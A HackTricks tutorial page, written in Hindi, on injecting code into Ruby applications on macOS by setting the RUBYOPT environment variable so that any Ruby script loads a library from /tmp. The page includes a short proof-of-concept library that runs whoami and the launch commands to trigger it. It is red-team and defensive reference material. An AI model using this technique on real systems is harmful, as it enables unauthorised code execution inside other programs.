HackTricksmacOS Ruby Applications Injection
Reading time: 2 minutes
tip
AWS हैकिंग सीखें और अभ्यास करें:
HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: 
HackTricks Training GCP Red Team Expert (GRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाएँ देखें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमारे Twitter 🐦 @hacktricks_live** का पालन करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।
RUBYOPT
इस env वेरिएबल का उपयोग करके ruby को निष्पादित करते समय नए params जोड़ना संभव है। हालांकि -e पैरामीटर का उपयोग ruby को निष्पादित करने के लिए कोड निर्दिष्ट करने के लिए नहीं किया जा सकता, लेकिन -I और -r पैरामीटर का उपयोग करके लोड पथ में एक नई फ़ोल्डर जोड़ना और फिर लोड करने के लिए एक पुस्तकालय निर्दिष्ट करना संभव है।
पुस्तकालय inject.rb को /tmp में बनाएं:
puts `whoami`
किसी भी जगह एक रूबी स्क्रिप्ट बनाएं जैसे:
puts 'Hello, World!'
फिर एक मनमाना रूबी स्क्रिप्ट इसे लोड करें:
RUBYOPT="-I/tmp -rinject" ruby hello.rb
दिलचस्प तथ्य, यह --disable-rubyopt पैरामीटर के साथ भी काम करता है:
RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
tip
AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)
HackTricks का समर्थन करें
- सदस्यता योजनाएँ देखें!
- हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमारे Twitter 🐦 @hacktricks_live** का पालन करें।**
- हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।